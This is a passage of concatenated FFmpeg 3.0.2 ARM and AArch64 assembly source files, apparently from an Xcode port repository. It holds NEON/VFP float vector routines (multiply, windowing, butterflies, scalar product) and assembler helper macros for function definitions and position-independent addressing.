vst1.32 {d19[0]}, [r8], r12
vsri.32 d2, d0, #16
vst1.32 {d19[1]}, [r8], r12
vsri.32 d3, d1, #16
vst1.32 {d22[0]}, [r8], r12
vsri.32 d6, d4, #16
vst1.32 {d22[1]}, [r8], r12
vsri.32 d7, d5, #16
vst1.32 {d23[0]}, [r8], r12
vst1.32 {d23[1]}, [r8], r12
beq 6f
vld1.32 {q8}, [r4,:128]!
vcvt.s32.f32 q8, q8, #31
vst1.32 {d2[0]}, [r8], r12
vst1.32 {d2[1]}, [r8], r12
vld1.32 {q9}, [r5,:128]!
vcvt.s32.f32 q9, q9, #31
vst1.32 {d3[0]}, [r8], r12
vst1.32 {d3[1]}, [r8], r12
vld1.32 {q10}, [r4,:128]!
vcvt.s32.f32 q10, q10, #31
vst1.32 {d6[0]}, [r8], r12
vst1.32 {d6[1]}, [r8], r12
vld1.32 {q11}, [r5,:128]!
vcvt.s32.f32 q11, q11, #31
vst1.32 {d7[0]}, [r8], r12
vst1.32 {d7[1]}, [r8], r12
bgt 6b
6: vst1.32 {d2[0]}, [r8], r12
vst1.32 {d2[1]}, [r8], r12
vst1.32 {d3[0]}, [r8], r12
vst1.32 {d3[1]}, [r8], r12
vst1.32 {d6[0]}, [r8], r12
vst1.32 {d6[1]}, [r8], r12
vst1.32 {d7[0]}, [r8], r12
vst1.32 {d7[1]}, [r8], r12
b 8f
7: vsri.32 d18, d16, #16
vsri.32 d19, d17, #16
vst1.32 {d18[0]}, [r8], r12
vsri.32 d22, d20, #16
vst1.32 {d18[1]}, [r8], r12
vsri.32 d23, d21, #16
vst1.32 {d19[0]}, [r8], r12
vst1.32 {d19[1]}, [r8], r12
vst1.32 {d22[0]}, [r8], r12
vst1.32 {d22[1]}, [r8], r12
vst1.32 {d23[0]}, [r8], r12
vst1.32 {d23[1]}, [r8], r12
8: subs r3, r3, #2
add r0, r0, #4
it eq
popeq {r4-r8, pc}
@ 1 channel
4: ldr r4, [r1]
tst r2, #8
mov lr, r2
mov r5, r0
vld1.32 {q0}, [r4,:128]!
vcvt.s32.f32 q0, q0, #31
vld1.32 {q1}, [r4,:128]!
vcvt.s32.f32 q1, q1, #31
bne 8f
6: subs lr, lr, #16
vld1.32 {q2}, [r4,:128]!
vcvt.s32.f32 q2, q2, #31
vld1.32 {q3}, [r4,:128]!
vcvt.s32.f32 q3, q3, #31
vst1.16 {d0[1]}, [r5,:16], r12
vst1.16 {d0[3]}, [r5,:16], r12
vst1.16 {d1[1]}, [r5,:16], r12
vst1.16 {d1[3]}, [r5,:16], r12
vst1.16 {d2[1]}, [r5,:16], r12
vst1.16 {d2[3]}, [r5,:16], r12
vst1.16 {d3[1]}, [r5,:16], r12
vst1.16 {d3[3]}, [r5,:16], r12
beq 7f
vld1.32 {q0}, [r4,:128]!
vcvt.s32.f32 q0, q0, #31
vld1.32 {q1}, [r4,:128]!
vcvt.s32.f32 q1, q1, #31
7: vst1.16 {d4[1]}, [r5,:16], r12
vst1.16 {d4[3]}, [r5,:16], r12
vst1.16 {d5[1]}, [r5,:16], r12
vst1.16 {d5[3]}, [r5,:16], r12
vst1.16 {d6[1]}, [r5,:16], r12
vst1.16 {d6[3]}, [r5,:16], r12
vst1.16 {d7[1]}, [r5,:16], r12
vst1.16 {d7[3]}, [r5,:16], r12
bgt 6b
pop {r4-r8, pc}
8: subs lr, lr, #8
vst1.16 {d0[1]}, [r5,:16], r12
vst1.16 {d0[3]}, [r5,:16], r12
vst1.16 {d1[1]}, [r5,:16], r12
vst1.16 {d1[3]}, [r5,:16], r12
vst1.16 {d2[1]}, [r5,:16], r12
vst1.16 {d2[3]}, [r5,:16], r12
vst1.16 {d3[1]}, [r5,:16], r12
vst1.16 {d3[3]}, [r5,:16], r12
it eq
popeq {r4-r8, pc}
vld1.32 {q0}, [r4,:128]!
vcvt.s32.f32 q0, q0, #31
vld1.32 {q1}, [r4,:128]!
vcvt.s32.f32 q1, q1, #31
b 6b
endfunc
|
Akagi201/ffmpeg-xcode
| 2,163
|
ffmpeg-3.0.2/libavutil/aarch64/asm.S
|
/*
* Copyright (c) 2008 Mans Rullgard <mans@mansr.com>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "config.h"
#ifdef __ELF__
# define ELF
#else
# define ELF #
#endif
#if HAVE_AS_FUNC
# define FUNC
#else
# define FUNC #
#endif
.macro function name, export=0, align=2
.macro endfunc
ELF .size \name, . - \name
FUNC .endfunc
.purgem endfunc
.endm
.text
.align \align
.if \export
.global EXTERN_ASM\name
ELF .type EXTERN_ASM\name, %function
FUNC .func EXTERN_ASM\name
EXTERN_ASM\name:
.else
ELF .type \name, %function
FUNC .func \name
\name:
.endif
.endm
.macro const name, align=2, relocate=0
.macro endconst
ELF .size \name, . - \name
.purgem endconst
.endm
#if HAVE_SECTION_DATA_REL_RO
.if \relocate
.section .data.rel.ro
.else
.section .rodata
.endif
#elif !defined(__MACH__)
.section .rodata
#else
.const_data
#endif
.align \align
\name:
.endm
.macro movrel rd, val
#if CONFIG_PIC && defined(__APPLE__)
adrp \rd, \val@PAGE
add \rd, \rd, \val@PAGEOFF
#elif CONFIG_PIC
adrp \rd, \val
add \rd, \rd, :lo12:\val
#else
ldr \rd, =\val
#endif
.endm
#define GLUE(a, b) a ## b
#define JOIN(a, b) GLUE(a, b)
#define X(s) JOIN(EXTERN_ASM, s)
|
Akagi201/ffmpeg-xcode
| 7,934
|
ffmpeg-3.0.2/libavutil/aarch64/float_dsp_neon.S
|
/*
* ARM NEON optimised Float DSP functions
* Copyright (c) 2008 Mans Rullgard <mans@mansr.com>
* Copyright (c) 2014 Janne Grunau <janne-libav@jannau.net>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "config.h"
#include "asm.S"
function ff_vector_fmul_neon, export=1
1: subs w3, w3, #16
ld1 {v0.4S, v1.4S}, [x1], #32
ld1 {v2.4S, v3.4S}, [x1], #32
ld1 {v4.4S, v5.4S}, [x2], #32
ld1 {v6.4S, v7.4S}, [x2], #32
fmul v16.4S, v0.4S, v4.4S
fmul v17.4S, v1.4S, v5.4S
fmul v18.4S, v2.4S, v6.4S
fmul v19.4S, v3.4S, v7.4S
st1 {v16.4S, v17.4S}, [x0], #32
st1 {v18.4S, v19.4S}, [x0], #32
b.ne 1b
ret
endfunc
function ff_vector_fmac_scalar_neon, export=1
mov x3, #-32
1: subs w2, w2, #16
ld1 {v16.4S, v17.4S}, [x0], #32
ld1 {v18.4S, v19.4S}, [x0], x3
ld1 {v4.4S, v5.4S}, [x1], #32
ld1 {v6.4S, v7.4S}, [x1], #32
fmla v16.4S, v4.4S, v0.S[0]
fmla v17.4S, v5.4S, v0.S[0]
fmla v18.4S, v6.4S, v0.S[0]
fmla v19.4S, v7.4S, v0.S[0]
st1 {v16.4S, v17.4S}, [x0], #32
st1 {v18.4S, v19.4S}, [x0], #32
b.ne 1b
ret
endfunc
function ff_vector_fmul_scalar_neon, export=1
mov w4, #15
bics w3, w2, w4
dup v16.4S, v0.S[0]
b.eq 3f
ld1 {v0.4S, v1.4S}, [x1], #32
1: subs w3, w3, #16
fmul v0.4S, v0.4S, v16.4S
ld1 {v2.4S, v3.4S}, [x1], #32
fmul v1.4S, v1.4S, v16.4S
fmul v2.4S, v2.4S, v16.4S
st1 {v0.4S, v1.4S}, [x0], #32
fmul v3.4S, v3.4S, v16.4S
b.eq 2f
ld1 {v0.4S, v1.4S}, [x1], #32
st1 {v2.4S, v3.4S}, [x0], #32
b 1b
2: ands w2, w2, #15
st1 {v2.4S, v3.4S}, [x0], #32
b.eq 4f
3: ld1 {v0.4S}, [x1], #16
fmul v0.4S, v0.4S, v16.4S
st1 {v0.4S}, [x0], #16
subs w2, w2, #4
b.gt 3b
4: ret
endfunc
function ff_vector_dmul_scalar_neon, export=1
dup v16.2D, v0.D[0]
ld1 {v0.2D, v1.2D}, [x1], #32
1: subs w2, w2, #8
fmul v0.2D, v0.2D, v16.2D
ld1 {v2.2D, v3.2D}, [x1], #32
fmul v1.2D, v1.2D, v16.2D
fmul v2.2D, v2.2D, v16.2D
st1 {v0.2D, v1.2D}, [x0], #32
fmul v3.2D, v3.2D, v16.2D
ld1 {v0.2D, v1.2D}, [x1], #32
st1 {v2.2D, v3.2D}, [x0], #32
b.gt 1b
ret
endfunc
function ff_vector_fmul_window_neon, export=1
sxtw x4, w4 // len
sub x2, x2, #8
sub x5, x4, #2
add x2, x2, x5, lsl #2 // src1 + 4 * (len - 4)
add x6, x3, x5, lsl #3 // win + 8 * (len - 2)
add x5, x0, x5, lsl #3 // dst + 8 * (len - 2)
mov x7, #-16
ld1 {v0.4S}, [x1], #16 // s0
ld1 {v2.4S}, [x3], #16 // wi
ld1 {v1.4S}, [x2], x7 // s1
1: ld1 {v3.4S}, [x6], x7 // wj
subs x4, x4, #4
fmul v17.4S, v0.4S, v2.4S // s0 * wi
rev64 v4.4S, v1.4S
rev64 v5.4S, v3.4S
rev64 v17.4S, v17.4S
ext v4.16B, v4.16B, v4.16B, #8 // s1_r
ext v5.16B, v5.16B, v5.16B, #8 // wj_r
ext v17.16B, v17.16B, v17.16B, #8 // (s0 * wi)_rev
fmul v16.4S, v0.4S, v5.4S // s0 * wj_r
fmla v17.4S, v1.4S, v3.4S // (s0 * wi)_rev + s1 * wj
b.eq 2f
ld1 {v0.4S}, [x1], #16
fmls v16.4S, v4.4S, v2.4S // s0 * wj_r - s1_r * wi
st1 {v17.4S}, [x5], x7
ld1 {v2.4S}, [x3], #16
ld1 {v1.4S}, [x2], x7
st1 {v16.4S}, [x0], #16
b 1b
2:
fmls v16.4S, v4.4S, v2.4S // s0 * wj_r - s1_r * wi
st1 {v17.4S}, [x5], x7
st1 {v16.4S}, [x0], #16
ret
endfunc
function ff_vector_fmul_add_neon, export=1
ld1 {v0.4S, v1.4S}, [x1], #32
ld1 {v2.4S, v3.4S}, [x2], #32
ld1 {v4.4S, v5.4S}, [x3], #32
1: subs w4, w4, #8
fmla v4.4S, v0.4S, v2.4S
fmla v5.4S, v1.4S, v3.4S
b.eq 2f
ld1 {v0.4S, v1.4S}, [x1], #32
ld1 {v2.4S, v3.4S}, [x2], #32
st1 {v4.4S, v5.4S}, [x0], #32
ld1 {v4.4S, v5.4S}, [x3], #32
b 1b
2: st1 {v4.4S, v5.4S}, [x0], #32
ret
endfunc
function ff_vector_fmul_reverse_neon, export=1
sxtw x3, w3
add x2, x2, x3, lsl #2
sub x2, x2, #32
mov x4, #-32
ld1 {v2.4S, v3.4S}, [x2], x4
ld1 {v0.4S, v1.4S}, [x1], #32
1: subs x3, x3, #8
rev64 v3.4S, v3.4S
rev64 v2.4S, v2.4S
ext v3.16B, v3.16B, v3.16B, #8
ext v2.16B, v2.16B, v2.16B, #8
fmul v16.4S, v0.4S, v3.4S
fmul v17.4S, v1.4S, v2.4S
b.eq 2f
ld1 {v2.4S, v3.4S}, [x2], x4
ld1 {v0.4S, v1.4S}, [x1], #32
st1 {v16.4S, v17.4S}, [x0], #32
b 1b
2: st1 {v16.4S, v17.4S}, [x0], #32
ret
endfunc
function ff_butterflies_float_neon, export=1
1: ld1 {v0.4S}, [x0]
ld1 {v1.4S}, [x1]
subs w2, w2, #4
fsub v2.4S, v0.4S, v1.4S
fadd v3.4S, v0.4S, v1.4S
st1 {v2.4S}, [x1], #16
st1 {v3.4S}, [x0], #16
b.gt 1b
ret
endfunc
function ff_scalarproduct_float_neon, export=1
movi v2.4S, #0
1: ld1 {v0.4S}, [x0], #16
ld1 {v1.4S}, [x1], #16
subs w2, w2, #4
fmla v2.4S, v0.4S, v1.4S
b.gt 1b
faddp v0.4S, v2.4S, v2.4S
faddp s0, v0.2S
ret
endfunc
|
Akagi201/ffmpeg-xcode
| 15,252
|
ffmpeg-3.0.2/libavutil/arm/float_dsp_vfp.S
|
/*
* Copyright (c) 2008 Siarhei Siamashka <ssvb@users.sourceforge.net>
*
* This file is part of FFmpeg
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "config.h"
#include "asm.S"
/**
* Assume that len is a positive number and is multiple of 8
*/
@ void ff_vector_fmul_vfp(float *dst, const float *src0, const float *src1, int len)
function ff_vector_fmul_vfp, export=1
vpush {d8-d15}
fmrx r12, fpscr
orr r12, r12, #(3 << 16) /* set vector size to 4 */
fmxr fpscr, r12
vldmia r1!, {s0-s3}
vldmia r2!, {s8-s11}
vldmia r1!, {s4-s7}
vldmia r2!, {s12-s15}
vmul.f32 s8, s0, s8
1:
subs r3, r3, #16
vmul.f32 s12, s4, s12
itttt ge
vldmiage r1!, {s16-s19}
vldmiage r2!, {s24-s27}
vldmiage r1!, {s20-s23}
vldmiage r2!, {s28-s31}
it ge
vmulge.f32 s24, s16, s24
vstmia r0!, {s8-s11}
vstmia r0!, {s12-s15}
it ge
vmulge.f32 s28, s20, s28
itttt gt
vldmiagt r1!, {s0-s3}
vldmiagt r2!, {s8-s11}
vldmiagt r1!, {s4-s7}
vldmiagt r2!, {s12-s15}
ittt ge
vmulge.f32 s8, s0, s8
vstmiage r0!, {s24-s27}
vstmiage r0!, {s28-s31}
bgt 1b
bic r12, r12, #(7 << 16) /* set vector size back to 1 */
fmxr fpscr, r12
vpop {d8-d15}
bx lr
endfunc
/**
* ARM VFP implementation of 'vector_fmul_window_c' function
* Assume that len is a positive non-zero number
*/
@ void ff_vector_fmul_window_vfp(float *dst, const float *src0,
@ const float *src1, const float *win, int len)
function ff_vector_fmul_window_vfp, export=1
DST0 .req a1
SRC0 .req a2
SRC1 .req a3
WIN0 .req a4
LEN .req v1
DST1 .req v2
WIN1 .req v3
OLDFPSCR .req ip
push {v1-v3,lr}
ldr LEN, [sp, #4*4+0]
vpush {s16-s31}
fmrx OLDFPSCR, FPSCR
add DST1, DST0, LEN, lsl #3
add SRC1, SRC1, LEN, lsl #2
add WIN1, WIN0, LEN, lsl #3
tst LEN, #7
beq 4f @ common case: len is a multiple of 8
ldr lr, =0x03000000 @ RunFast mode, scalar mode
fmxr FPSCR, lr
tst LEN, #1
beq 1f
vldmdb WIN1!, {s0}
vldmia SRC0!, {s8}
vldmia WIN0!, {s16}
vmul.f s24, s0, s8
vldmdb SRC1!, {s20}
vmul.f s8, s16, s8
vmls.f s24, s16, s20
vmla.f s8, s0, s20
vstmia DST0!, {s24}
vstmdb DST1!, {s8}
1:
tst LEN, #2
beq 2f
vldmdb WIN1!, {s0}
vldmdb WIN1!, {s1}
vldmia SRC0!, {s8-s9}
vldmia WIN0!, {s16-s17}
vmul.f s24, s0, s8
vmul.f s25, s1, s9
vldmdb SRC1!, {s20}
vldmdb SRC1!, {s21}
vmul.f s8, s16, s8
vmul.f s9, s17, s9
vmls.f s24, s16, s20
vmls.f s25, s17, s21
vmla.f s8, s0, s20
vmla.f s9, s1, s21
vstmia DST0!, {s24-s25}
vstmdb DST1!, {s8}
vstmdb DST1!, {s9}
2:
tst LEN, #4
beq 3f
vldmdb WIN1!, {s0}
vldmdb WIN1!, {s1}
vldmdb WIN1!, {s2}
vldmdb WIN1!, {s3}
vldmia SRC0!, {s8-s11}
vldmia WIN0!, {s16-s19}
vmul.f s24, s0, s8
vmul.f s25, s1, s9
vmul.f s26, s2, s10
vmul.f s27, s3, s11
vldmdb SRC1!, {s20}
vldmdb SRC1!, {s21}
vldmdb SRC1!, {s22}
vldmdb SRC1!, {s23}
vmul.f s8, s16, s8
vmul.f s9, s17, s9
vmul.f s10, s18, s10
vmul.f s11, s19, s11
vmls.f s24, s16, s20
vmls.f s25, s17, s21
vmls.f s26, s18, s22
vmls.f s27, s19, s23
vmla.f s8, s0, s20
vmla.f s9, s1, s21
vmla.f s10, s2, s22
vmla.f s11, s3, s23
vstmia DST0!, {s24-s27}
vstmdb DST1!, {s8}
vstmdb DST1!, {s9}
vstmdb DST1!, {s10}
vstmdb DST1!, {s11}
3:
bics LEN, LEN, #7
beq 7f
4:
ldr lr, =0x03030000 @ RunFast mode, short vectors of length 4, stride 1
fmxr FPSCR, lr
vldmdb WIN1!, {s0}
vldmdb WIN1!, {s1}
vldmdb WIN1!, {s2}
vldmdb WIN1!, {s3}
vldmia SRC0!, {s8-s11}
vldmia WIN0!, {s16-s19}
vmul.f s24, s0, s8 @ vector * vector
vldmdb SRC1!, {s20}
vldmdb SRC1!, {s21}
vldmdb SRC1!, {s22}
vldmdb SRC1!, {s23}
vmul.f s8, s16, s8 @ vector * vector
vmls.f s24, s16, s20 @ vector * vector
vldmdb WIN1!, {s4}
vldmdb WIN1!, {s5}
vldmdb WIN1!, {s6}
vldmdb WIN1!, {s7}
vldmia SRC0!, {s12-s13}
vmla.f s8, s0, s20 @ vector * vector
vldmia SRC0!, {s14-s15}
subs LEN, LEN, #8
beq 6f
5: vldmia WIN0!, {s20-s23}
vmul.f s28, s4, s12 @ vector * vector
vstmia DST0!, {s24-s25}
vldmdb SRC1!, {s16}
vldmdb SRC1!, {s17}
vldmdb SRC1!, {s18}
vldmdb SRC1!, {s19}
vmul.f s12, s20, s12 @ vector * vector
vstmia DST0!, {s26-s27}
vstmdb DST1!, {s8}
vstmdb DST1!, {s9}
vstmdb DST1!, {s10}
vstmdb DST1!, {s11}
vmls.f s28, s20, s16 @ vector * vector
vldmdb WIN1!, {s0}
vldmdb WIN1!, {s1}
vldmdb WIN1!, {s2}
vldmdb WIN1!, {s3}
vldmia SRC0!, {s8-s9}
vmla.f s12, s4, s16 @ vector * vector
vldmia SRC0!, {s10-s11}
subs LEN, LEN, #8
vldmia WIN0!, {s16-s19}
vmul.f s24, s0, s8 @ vector * vector
vstmia DST0!, {s28-s29}
vldmdb SRC1!, {s20}
vldmdb SRC1!, {s21}
vldmdb SRC1!, {s22}
vldmdb SRC1!, {s23}
vmul.f s8, s16, s8 @ vector * vector
vstmia DST0!, {s30-s31}
vstmdb DST1!, {s12}
vstmdb DST1!, {s13}
vstmdb DST1!, {s14}
vstmdb DST1!, {s15}
vmls.f s24, s16, s20 @ vector * vector
vldmdb WIN1!, {s4}
vldmdb WIN1!, {s5}
vldmdb WIN1!, {s6}
vldmdb WIN1!, {s7}
vldmia SRC0!, {s12-s13}
vmla.f s8, s0, s20 @ vector * vector
vldmia SRC0!, {s14-s15}
bne 5b
6: vldmia WIN0!, {s20-s23}
vmul.f s28, s4, s12 @ vector * vector
vstmia DST0!, {s24-s25}
vldmdb SRC1!, {s16}
vldmdb SRC1!, {s17}
vldmdb SRC1!, {s18}
vldmdb SRC1!, {s19}
vmul.f s12, s20, s12 @ vector * vector
vstmia DST0!, {s26-s27}
vstmdb DST1!, {s8}
vstmdb DST1!, {s9}
vstmdb DST1!, {s10}
vstmdb DST1!, {s11}
vmls.f s28, s20, s16 @ vector * vector
vmla.f s12, s4, s16 @ vector * vector
vstmia DST0!, {s28-s31}
vstmdb DST1!, {s12}
vstmdb DST1!, {s13}
vstmdb DST1!, {s14}
vstmdb DST1!, {s15}
7:
fmxr FPSCR, OLDFPSCR
vpop {s16-s31}
pop {v1-v3,pc}
.unreq DST0
.unreq SRC0
.unreq SRC1
.unreq WIN0
.unreq LEN
.unreq OLDFPSCR
.unreq DST1
.unreq WIN1
endfunc
/**
* ARM VFP optimized implementation of 'vector_fmul_reverse_c' function.
* Assume that len is a positive number and is multiple of 8
*/
@ void ff_vector_fmul_reverse_vfp(float *dst, const float *src0,
@ const float *src1, int len)
function ff_vector_fmul_reverse_vfp, export=1
vpush {d8-d15}
add r2, r2, r3, lsl #2
vldmdb r2!, {s0-s3}
vldmia r1!, {s8-s11}
vldmdb r2!, {s4-s7}
vldmia r1!, {s12-s15}
vmul.f32 s8, s3, s8
vmul.f32 s9, s2, s9
vmul.f32 s10, s1, s10
vmul.f32 s11, s0, s11
1:
subs r3, r3, #16
it ge
vldmdbge r2!, {s16-s19}
vmul.f32 s12, s7, s12
it ge
vldmiage r1!, {s24-s27}
vmul.f32 s13, s6, s13
it ge
vldmdbge r2!, {s20-s23}
vmul.f32 s14, s5, s14
it ge
vldmiage r1!, {s28-s31}
vmul.f32 s15, s4, s15
it ge
vmulge.f32 s24, s19, s24
it gt
vldmdbgt r2!, {s0-s3}
it ge
vmulge.f32 s25, s18, s25
vstmia r0!, {s8-s13}
it ge
vmulge.f32 s26, s17, s26
it gt
vldmiagt r1!, {s8-s11}
itt ge
vmulge.f32 s27, s16, s27
vmulge.f32 s28, s23, s28
it gt
vldmdbgt r2!, {s4-s7}
it ge
vmulge.f32 s29, s22, s29
vstmia r0!, {s14-s15}
ittt ge
vmulge.f32 s30, s21, s30
vmulge.f32 s31, s20, s31
vmulge.f32 s8, s3, s8
it gt
vldmiagt r1!, {s12-s15}
itttt ge
vmulge.f32 s9, s2, s9
vmulge.f32 s10, s1, s10
vstmiage r0!, {s24-s27}
vmulge.f32 s11, s0, s11
it ge
vstmiage r0!, {s28-s31}
bgt 1b
vpop {d8-d15}
bx lr
endfunc
/**
* ARM VFP implementation of 'butterflies_float_c' function
* Assume that len is a positive non-zero number
*/
@ void ff_butterflies_float_vfp(float *restrict v1, float *restrict v2, int len)
function ff_butterflies_float_vfp, export=1
BASE1 .req a1
BASE2 .req a2
LEN .req a3
OLDFPSCR .req a4
vpush {s16-s31}
fmrx OLDFPSCR, FPSCR
tst LEN, #7
beq 4f @ common case: len is a multiple of 8
ldr ip, =0x03000000 @ RunFast mode, scalar mode
fmxr FPSCR, ip
tst LEN, #1
beq 1f
vldmia BASE1!, {s0}
vldmia BASE2!, {s8}
vadd.f s16, s0, s8
vsub.f s24, s0, s8
vstr s16, [BASE1, #0-4*1]
vstr s24, [BASE2, #0-4*1]
1:
tst LEN, #2
beq 2f
vldmia BASE1!, {s0-s1}
vldmia BASE2!, {s8-s9}
vadd.f s16, s0, s8
vadd.f s17, s1, s9
vsub.f s24, s0, s8
vsub.f s25, s1, s9
vstr d8, [BASE1, #0-8*1] @ s16,s17
vstr d12, [BASE2, #0-8*1] @ s24,s25
2:
tst LEN, #4
beq 3f
vldmia BASE1!, {s0-s1}
vldmia BASE2!, {s8-s9}
vldmia BASE1!, {s2-s3}
vldmia BASE2!, {s10-s11}
vadd.f s16, s0, s8
vadd.f s17, s1, s9
vsub.f s24, s0, s8
vsub.f s25, s1, s9
vadd.f s18, s2, s10
vadd.f s19, s3, s11
vsub.f s26, s2, s10
vsub.f s27, s3, s11
vstr d8, [BASE1, #0-16*1] @ s16,s17
vstr d12, [BASE2, #0-16*1] @ s24,s25
vstr d9, [BASE1, #8-16*1] @ s18,s19
vstr d13, [BASE2, #8-16*1] @ s26,s27
3:
bics LEN, LEN, #7
beq 7f
4:
ldr ip, =0x03030000 @ RunFast mode, short vectors of length 4, stride 1
fmxr FPSCR, ip
vldmia BASE1!, {s0-s1}
vldmia BASE2!, {s8-s9}
vldmia BASE1!, {s2-s3}
vldmia BASE2!, {s10-s11}
vadd.f s16, s0, s8
vldmia BASE1!, {s4-s5}
vldmia BASE2!, {s12-s13}
vldmia BASE1!, {s6-s7}
vldmia BASE2!, {s14-s15}
vsub.f s24, s0, s8
vadd.f s20, s4, s12
subs LEN, LEN, #8
beq 6f
5: vldmia BASE1!, {s0-s3}
vldmia BASE2!, {s8-s11}
vsub.f s28, s4, s12
vstr d8, [BASE1, #0-16*3] @ s16,s17
vstr d9, [BASE1, #8-16*3] @ s18,s19
vstr d12, [BASE2, #0-16*3] @ s24,s25
vstr d13, [BASE2, #8-16*3] @ s26,s27
vadd.f s16, s0, s8
vldmia BASE1!, {s4-s7}
vldmia BASE2!, {s12-s15}
vsub.f s24, s0, s8
vstr d10, [BASE1, #0-16*3] @ s20,s21
vstr d11, [BASE1, #8-16*3] @ s22,s23
vstr d14, [BASE2, #0-16*3] @ s28,s29
vstr d15, [BASE2, #8-16*3] @ s30,s31
vadd.f s20, s4, s12
subs LEN, LEN, #8
bne 5b
6: vsub.f s28, s4, s12
vstr d8, [BASE1, #0-16*2] @ s16,s17
vstr d9, [BASE1, #8-16*2] @ s18,s19
vstr d12, [BASE2, #0-16*2] @ s24,s25
vstr d13, [BASE2, #8-16*2] @ s26,s27
vstr d10, [BASE1, #0-16*1] @ s20,s21
vstr d11, [BASE1, #8-16*1] @ s22,s23
vstr d14, [BASE2, #0-16*1] @ s28,s29
vstr d15, [BASE2, #8-16*1] @ s30,s31
7:
fmxr FPSCR, OLDFPSCR
vpop {s16-s31}
bx lr
.unreq BASE1
.unreq BASE2
.unreq LEN
.unreq OLDFPSCR
endfunc
|
Akagi201/ffmpeg-xcode
| 8,298
|
ffmpeg-3.0.2/libavutil/arm/asm.S
|
/*
* Copyright (c) 2008 Mans Rullgard <mans@mansr.com>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "config.h"
#ifdef __ELF__
# define ELF
#else
# define ELF @
#endif
#if CONFIG_THUMB
# define A @
# define T
#else
# define A
# define T @
#endif
#if HAVE_AS_FUNC
# define FUNC
#else
# define FUNC @
#endif
#if HAVE_NEON
.arch armv7-a
#elif HAVE_ARMV6T2
.arch armv6t2
#elif HAVE_ARMV6
.arch armv6
#elif HAVE_ARMV5TE
.arch armv5te
#endif
#if HAVE_AS_OBJECT_ARCH
ELF .object_arch armv4
#endif
#if HAVE_NEON
.fpu neon
ELF .eabi_attribute 10, 0 @ suppress Tag_FP_arch
ELF .eabi_attribute 12, 0 @ suppress Tag_Advanced_SIMD_arch
#elif HAVE_VFP
.fpu vfp
ELF .eabi_attribute 10, 0 @ suppress Tag_FP_arch
#endif
.syntax unified
T .thumb
ELF .eabi_attribute 25, 1 @ Tag_ABI_align_preserved
ELF .section .note.GNU-stack,"",%progbits @ Mark stack as non-executable
.macro function name, export=0, align=2
.set .Lpic_idx, 0
.set .Lpic_gp, 0
.macro endfunc
.if .Lpic_idx
.align 2
.altmacro
put_pic %(.Lpic_idx - 1)
.noaltmacro
.endif
ELF .size \name, . - \name
FUNC .endfunc
.purgem endfunc
.endm
.text
.align \align
.if \export
.global EXTERN_ASM\name
ELF .type EXTERN_ASM\name, %function
FUNC .func EXTERN_ASM\name
EXTERN_ASM\name:
.else
ELF .type \name, %function
FUNC .func \name
\name:
.endif
.endm
.macro const name, align=2, relocate=0
.macro endconst
ELF .size \name, . - \name
.purgem endconst
.endm
.if HAVE_SECTION_DATA_REL_RO && \relocate
.section .data.rel.ro
.else
.section .rodata
.endif
.align \align
\name:
.endm
#if !HAVE_ARMV6T2_EXTERNAL
.macro movw rd, val
mov \rd, \val & 255
orr \rd, \val & ~255
.endm
#endif
.macro mov32 rd, val
#if HAVE_ARMV6T2_EXTERNAL
movw \rd, #(\val) & 0xffff
.if (\val) >> 16
movt \rd, #(\val) >> 16
.endif
#else
ldr \rd, =\val
#endif
.endm
.macro put_pic num
put_pic_\num
.endm
.macro do_def_pic num, val, label
.macro put_pic_\num
.if \num
.altmacro
put_pic %(\num - 1)
.noaltmacro
.endif
\label: .word \val
.purgem put_pic_\num
.endm
.endm
.macro def_pic val, label
.altmacro
do_def_pic %.Lpic_idx, \val, \label
.noaltmacro
.set .Lpic_idx, .Lpic_idx + 1
.endm
.macro ldpic rd, val, indir=0
ldr \rd, .Lpicoff\@
.Lpic\@:
.if \indir
A ldr \rd, [pc, \rd]
T add \rd, pc
T ldr \rd, [\rd]
.else
add \rd, pc
.endif
def_pic \val - (.Lpic\@ + (8 >> CONFIG_THUMB)), .Lpicoff\@
.endm
.macro movrel rd, val
#if CONFIG_PIC
ldpic \rd, \val
#elif HAVE_ARMV6T2_EXTERNAL && !defined(__APPLE__)
movw \rd, #:lower16:\val
movt \rd, #:upper16:\val
#else
ldr \rd, =\val
#endif
.endm
.macro movrelx rd, val, gp
#if CONFIG_PIC && defined(__ELF__)
